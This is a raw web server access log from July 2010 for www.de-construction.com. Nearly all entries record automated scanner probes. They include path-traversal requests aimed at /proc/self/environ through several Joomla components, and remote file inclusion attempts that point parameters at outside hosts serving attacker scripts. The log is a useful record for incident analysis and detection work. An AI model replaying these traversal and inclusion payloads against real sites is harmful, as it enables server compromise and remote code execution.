110.45.140.231 - - [01/Jul/2010:20:39:04 -0700] "GET /logs/access_100601.log/?option=com_joomlalib&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.de-construction.com"
110.45.140.231 - - [01/Jul/2010:20:39:04 -0700] "GET /?option=com_joomlalib&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.de-construction.com"
110.45.140.231 - - [01/Jul/2010:20:39:05 -0700] "GET /logs/?option=com_joomlalib&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1367 "-" "libwww-perl/5.79" "www.de-construction.com"
213.160.169.74 - - [01/Jul/2010:20:40:30 -0700] "GET /logs/access_100601.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
213.160.169.74 - - [01/Jul/2010:20:40:31 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
213.160.169.74 - - [01/Jul/2010:20:40:31 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
110.45.140.231 - - [01/Jul/2010:20:43:07 -0700] "GET /?option=com_joomlalib&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.de-construction.com"
189.113.97.250 - - [01/Jul/2010:20:45:14 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.806" "www.de-construction.com"
189.113.97.250 - - [01/Jul/2010:20:45:15 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.806" "www.de-construction.com"
213.189.224.16 - - [01/Jul/2010:20:45:44 -0700] "GET /logs/access_100531.log//bbs//skin/zero_vote/ask_password.php?dir=http://www.gracefellowshiptv.com/lecture/photoshop/color_word_files/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.189.224.16 - - [01/Jul/2010:20:45:44 -0700] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.gracefellowshiptv.com/lecture/photoshop/color_word_files/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.189.224.16 - - [01/Jul/2010:20:45:44 -0700] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.gracefellowshiptv.com/lecture/photoshop/color_word_files/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.189.224.16 - - [01/Jul/2010:20:46:08 -0700] "GET /logs/access_100601.log//bbs//skin/zero_vote/ask_password.php?dir=http://www.gracefellowshiptv.com/lecture/photoshop/color_word_files/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.189.224.16 - - [01/Jul/2010:20:48:05 -0700] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.gracefellowshiptv.com/lecture/photoshop/color_word_files/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.189.224.16 - - [01/Jul/2010:20:48:05 -0700] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.gracefellowshiptv.com/lecture/photoshop/color_word_files/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.189.224.16 - - [01/Jul/2010:20:48:05 -0700] "GET /logs/access_100601.log%20%20//bbs//skin/zero_vote/ask_password.php?dir=http://www.gracefellowshiptv.com/lecture/photoshop/color_word_files/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.189.224.16 - - [01/Jul/2010:20:48:20 -0700] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.gracefellowshiptv.com/lecture/photoshop/color_word_files/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.189.224.16 - - [01/Jul/2010:20:48:20 -0700] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.gracefellowshiptv.com/lecture/photoshop/color_word_files/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.189.224.16 - - [01/Jul/2010:20:48:20 -0700] "GET /logs/access.log//bbs//skin/zero_vote/ask_password.php?dir=http://www.gracefellowshiptv.com/lecture/photoshop/color_word_files/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
202.134.24.62 - - [01/Jul/2010:20:54:11 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
93.186.192.124 - - [01/Jul/2010:21:03:02 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [01/Jul/2010:21:03:02 -0700] "GET /logs/access_100531.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [01/Jul/2010:21:03:02 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
212.7.7.174 - - [01/Jul/2010:21:17:00 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://nic.bupt.edu.cn/media/idx HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
212.7.7.174 - - [01/Jul/2010:21:17:01 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://nic.bupt.edu.cn/media/idx HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
189.113.97.250 - - [01/Jul/2010:21:23:11 -0700] "GET /logs/access_100601.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.806" "www.de-construction.com"
189.113.97.250 - - [01/Jul/2010:21:23:15 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.806" "www.de-construction.com"
189.113.97.250 - - [01/Jul/2010:21:23:15 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.806" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:21:28:55 -0700] "GET /logs//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:21:28:55 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:21:29:02 -0700] "GET /logs//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:21:29:02 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:21:29:07 -0700] "GET /logs//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:21:29:07 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:21:29:09 -0700] "GET /logs//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:21:29:10 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:21:30:05 -0700] "GET /logs//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:21:30:05 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:21:30:14 -0700] "GET /logs//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:21:30:14 -0700] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:21:31:13 -0700] "GET /logs//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:21:31:13 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
94.124.120.23 - - [01/Jul/2010:21:32:20 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.dukhi.co.uk/includes/PEAR/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.124.120.23 - - [01/Jul/2010:21:32:20 -0700] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.dukhi.co.uk/includes/PEAR/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.124.120.23 - - [01/Jul/2010:21:32:20 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.dukhi.co.uk/includes/PEAR/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.124.120.23 - - [01/Jul/2010:21:32:56 -0700] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.dukhi.co.uk/includes/PEAR/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.124.120.23 - - [01/Jul/2010:21:32:56 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.dukhi.co.uk/includes/PEAR/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.124.120.23 - - [01/Jul/2010:21:32:56 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.dukhi.co.uk/includes/PEAR/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
212.7.7.174 - - [01/Jul/2010:21:33:41 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/idx HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
212.7.7.174 - - [01/Jul/2010:21:33:42 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/idx HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
94.124.120.23 - - [01/Jul/2010:21:34:13 -0700] "GET /logs//skin/ggerzer_diary/ask_password.php?dir=http://www.dukhi.co.uk/includes/PEAR/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.124.120.23 - - [01/Jul/2010:21:34:13 -0700] "GET /skin/ggerzer_diary/ask_password.php?dir=http://www.dukhi.co.uk/includes/PEAR/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.124.120.23 - - [01/Jul/2010:21:34:13 -0700] "GET /logs/access.log//skin/ggerzer_diary/ask_password.php?dir=http://www.dukhi.co.uk/includes/PEAR/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.124.120.23 - - [01/Jul/2010:21:34:17 -0700] "GET /skin/ggerzer_diary/ask_password.php?dir=http://www.dukhi.co.uk/includes/PEAR/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.124.120.23 - - [01/Jul/2010:21:34:17 -0700] "GET /logs//skin/ggerzer_diary/ask_password.php?dir=http://www.dukhi.co.uk/includes/PEAR/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.124.120.23 - - [01/Jul/2010:21:34:17 -0700] "GET /logs/access.log//skin/ggerzer_diary/ask_password.php?dir=http://www.dukhi.co.uk/includes/PEAR/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.124.120.23 - - [01/Jul/2010:21:34:39 -0700] "GET /logs//skin/ggerzer_diary/ask_password.php?dir=http://www.dukhi.co.uk/includes/PEAR/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.124.120.23 - - [01/Jul/2010:21:34:39 -0700] "GET /skin/ggerzer_diary/ask_password.php?dir=http://www.dukhi.co.uk/includes/PEAR/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.124.120.23 - - [01/Jul/2010:21:34:39 -0700] "GET /logs/access.log//skin/ggerzer_diary/ask_password.php?dir=http://www.dukhi.co.uk/includes/PEAR/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:21:35:48 -0700] "GET /logs//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:21:35:49 -0700] "GET /logs//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:21:35:49 -0700] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:21:35:49 -0700] "GET /logs//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:21:35:49 -0700] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:21:35:49 -0700] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:21:35:50 -0700] "GET /logs//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:21:35:50 -0700] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
202.146.215.116 - - [01/Jul/2010:21:40:00 -0700] "GET /logs/access_100601.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
202.146.215.116 - - [01/Jul/2010:21:40:01 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
202.146.215.116 - - [01/Jul/2010:21:40:01 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
94.124.120.23 - - [01/Jul/2010:21:40:42 -0700] "GET /logs/access_100501.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.dukhi.co.uk/includes/PEAR/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.124.120.23 - - [01/Jul/2010:21:41:35 -0700] "GET /logs/access_100501.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.dukhi.co.uk/includes/PEAR/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.124.120.23 - - [01/Jul/2010:21:41:54 -0700] "GET /logs/access_100531.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.dukhi.co.uk/includes/PEAR/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
202.146.215.116 - - [01/Jul/2010:21:43:25 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
202.146.215.116 - - [01/Jul/2010:21:43:25 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:21:47:14 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:21:47:14 -0700] "GET /logs/access.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:21:47:15 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:21:47:24 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:21:47:25 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:21:47:25 -0700] "GET /logs/access.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:21:47:50 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:21:47:50 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:21:47:50 -0700] "GET /logs/access.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:22:00:36 -0700] "GET /logs/access_100601.log%20%20//extcalendar.php?mosConfig_absolute_path=http://www.amde.org.br/joomla/images/stories/fruit/a?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:22:00:36 -0700] "GET /logs//extcalendar.php?mosConfig_absolute_path=http://www.amde.org.br/joomla/images/stories/fruit/a?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:22:00:36 -0700] "GET /extcalendar.php?mosConfig_absolute_path=http://www.amde.org.br/joomla/images/stories/fruit/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
202.134.24.62 - - [01/Jul/2010:22:05:59 -0700] "GET /logs/access_100601.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
202.134.24.62 - - [01/Jul/2010:22:06:00 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
202.134.24.62 - - [01/Jul/2010:22:06:01 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
66.77.59.248 - - [01/Jul/2010:22:16:18 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.de-construction.com"
213.203.199.129 - - [01/Jul/2010:22:16:51 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.de-construction.com"
66.77.59.248 - - [01/Jul/2010:22:27:34 -0700] "GET /logs/access_100331.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.de-construction.com"
66.77.59.248 - - [01/Jul/2010:22:27:34 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.de-construction.com"
66.77.59.248 - - [01/Jul/2010:22:27:34 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.de-construction.com"
95.108.247.251 - - [01/Jul/2010:22:27:35 -0700] "GET /logs/access.log HTTP/1.1" 200 347972 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:22:31:34 -0700] "GET /logs/administrator/components/com_pinboard/install.pinboard.php?mosConfig_absolute_path=http://www.amde.org.br/joomla/images/stories/fruit/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:22:31:34 -0700] "GET /administrator/components/com_pinboard/install.pinboard.php?mosConfig_absolute_path=http://www.amde.org.br/joomla/images/stories/fruit/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
